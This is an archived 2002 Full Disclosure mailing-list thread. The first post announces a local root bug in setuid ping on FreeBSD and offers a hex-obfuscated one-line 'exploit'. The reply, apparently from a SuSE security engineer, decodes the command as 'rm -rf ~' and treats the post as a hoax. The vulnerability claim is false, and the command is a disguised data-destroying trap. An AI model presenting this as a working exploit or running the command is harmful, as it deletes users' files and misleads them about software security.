Mailing List Archive: Full Disclosure: Full-Disclosure

ATTENTION Local Root ATTENTION

Full Disclosure full-disclosure RSS feed

Index | Next | Previous | View Threaded

drdre at hush

Sep 15, 2002, 6:28 AM

Post #1 of 2 (66 views)
Permalink

ATTENTION Local Root ATTENTION

DrDre-Labs recently discovered a rather dangerous bug in the "ping" program which is installed setuid-root on most unix and unixlike systems. This bug is not remotly exploitable.

Tested on FreeBSD 4.6

bash# id
uid=1337(drdre) gid=1006(researchers) groups=1006(researchers) 1008(lab-staff)

bash# ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
server error ^

^

$ id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)

Vendors are already informed.

Greets: Captain Crunch, Peter Pan, Charly Root

Regards
--
DrDre security research group

Get your free encrypted email at https://www.hushmail.com

draht at suse

Sep 15, 2002, 7:25 AM

Post #2 of 2 (68 views)
Permalink

Re: ATTENTION Local Root ATTENTION [In reply to]

>
> bash# ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
> server error ^
>

Yes.

This results in executing

rm -rf ~

> $ id
> uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
>
>
> Vendors are already informed.
>

Yes yes...

>
> Greets: Captain Crunch, Peter Pan, Charly Root
>
>
> Regards
> --
> DrDre security research group

Always good for a Sunday afternoon entertainment,
Roman.
--
- -
| Roman Drahtmüller <draht [at] suse> // "You don't need eyes to see, |
SuSE Linux AG - Security Phone: // you need vision!"
| Nürnberg, Germany +49-911-740530 // Maxi Jazz, Faithless |
- -

Index | Next | Previous | View Threaded

Interested in having your list archived? Contact Gossamer Threads